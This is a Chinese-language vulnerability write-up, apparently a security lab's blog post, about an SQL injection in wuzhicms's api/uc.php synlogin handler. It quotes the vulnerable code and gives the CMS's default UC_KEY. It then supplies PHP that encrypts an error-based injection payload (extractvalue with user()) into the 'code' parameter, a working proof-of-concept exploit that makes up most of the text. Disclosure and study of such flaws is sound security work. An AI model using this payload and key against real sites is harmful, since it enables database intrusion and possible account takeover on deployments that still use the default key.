wuzhicms注入

原创

蚁景网安实验室 2023-05-22 17:12:27 ©著作权

©著作权归作者所有：来自51CTO博客作者蚁景网安实验室的原创作品，请联系作者获取转载授权，否则将追究法律责任

api/uc.php SQL 存在注入


漏洞文件/api/uc.php
<?php
$code = isset($GLOBALS['code']) ? $GLOBALS['code'] : '';
$get = $GLOBALS;
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
 
if(MAGIC_QUOTES_GPC) $get = _stripslashes($get);
...
 
if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
$uc_note = new uc_note();
header('Content-type: text/html; charset='.CHARSET);
$action = $get['action'];
echo $uc_note->$action($get, $post);
exit();
} else {
exit(API_RETURN_FAILED);
}
 
...
 
    function synlogin($get, $post) {
header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
$username = $get['username'];
$r = $this->member->db->get_one('member', 'username="'.$username.'"');
        
if($r){
$cookietime = COOKIE_TTL ? SYS_TIME.COOKIE_TTL : 0;
set_cookie('auth', encode($r['uid']."\t".$r['password']."\t".$cookietime, substr(md5(_KEY), 8, 8)), $cookietime);
set_cookie('_uid', $r['uid'], $cookietime);
set_cookie('_username', $r['username'], $cookietime);
set_cookie('_groupid', $r['groupid'], $cookietime);
}
return API_RETURN_SUCCEED;
}
?>

正如上面的代码，如果我们知道UCYKEY，我们可以解码所有的$get参数，而“用户名”参数会导致SQL注入在最新版本中，UCKIKE为“UCYKEY”＝> E063RBKHX22RAVIG

我们可以使用下面的代码来计算“代码”值

$a = 'time='.time().'&action=synlogin&username=aa" and extractvalue(1,concat(0x7e,user()))#';
$code1 = urlencode(_authcode($a, 'ENCODE', 'e063rbkHX22RAvIg'));
var_dump($code1);exit;
 
 
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
 
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
 
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
 
$result = '';
$box = range(0, 255);
 
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
 
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
 
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
 
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
 
}

==========================
POC && EXP

wuzhicms注入_i++